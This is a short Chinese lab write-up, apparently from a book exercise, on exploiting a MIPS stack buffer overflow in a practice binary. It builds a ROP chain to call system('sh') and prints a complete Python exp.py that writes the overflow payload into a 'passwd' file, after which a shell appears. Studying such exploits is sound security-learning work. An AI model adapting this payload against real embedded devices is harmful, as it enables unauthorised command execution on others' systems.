MIPS缓冲区溢出 — exploit

根据上文分析得到的offset,接下来拼接shellcode,首先使用ida脚本mipsrop.py查找可用的rop chain

跳转到此rop chain代码处,需要构造system执行的命令

cmd == 寄存器A1值 == 0x00402060处的$sp,0x58-0x40


address == 寄存器RA == 0x58-0x4

寄存器RA的值需要是system的执行函数,根据function name找到do_system_0,查看调用指令,地址在0x00400708,所以0x40 – 0x4 == 0x3C 处存放此地址

整理出的ROP Chain(书中有错误)

据此编写exp.py

#/usr/bin/env python

import struct

print '[*] prepare shellcode ',
cmd = 'sh'
cmd += "\x00"*(4-(len(cmd)%4))

shellcode = "A"*0x19c
shellcode += struct.pack(">L", 0x00402060)
shellcode += "A"*0x18
shellcode += cmd
shellcode += "B"*(0x3C-len(cmd))
shellcode += struct.pack(">L", 0x00400708)
shellcode += "CCCC"

print ' ok'

print '[+] create passwd file ',
fw = open('passwd','w')
fw.write(shellcode)
fw.close()
print ' ok'

执行py文件,shellcode写入passwd文件成功

执行vuln_system程序,高贵的$符号出现,说明exp成功

您可能还喜欢...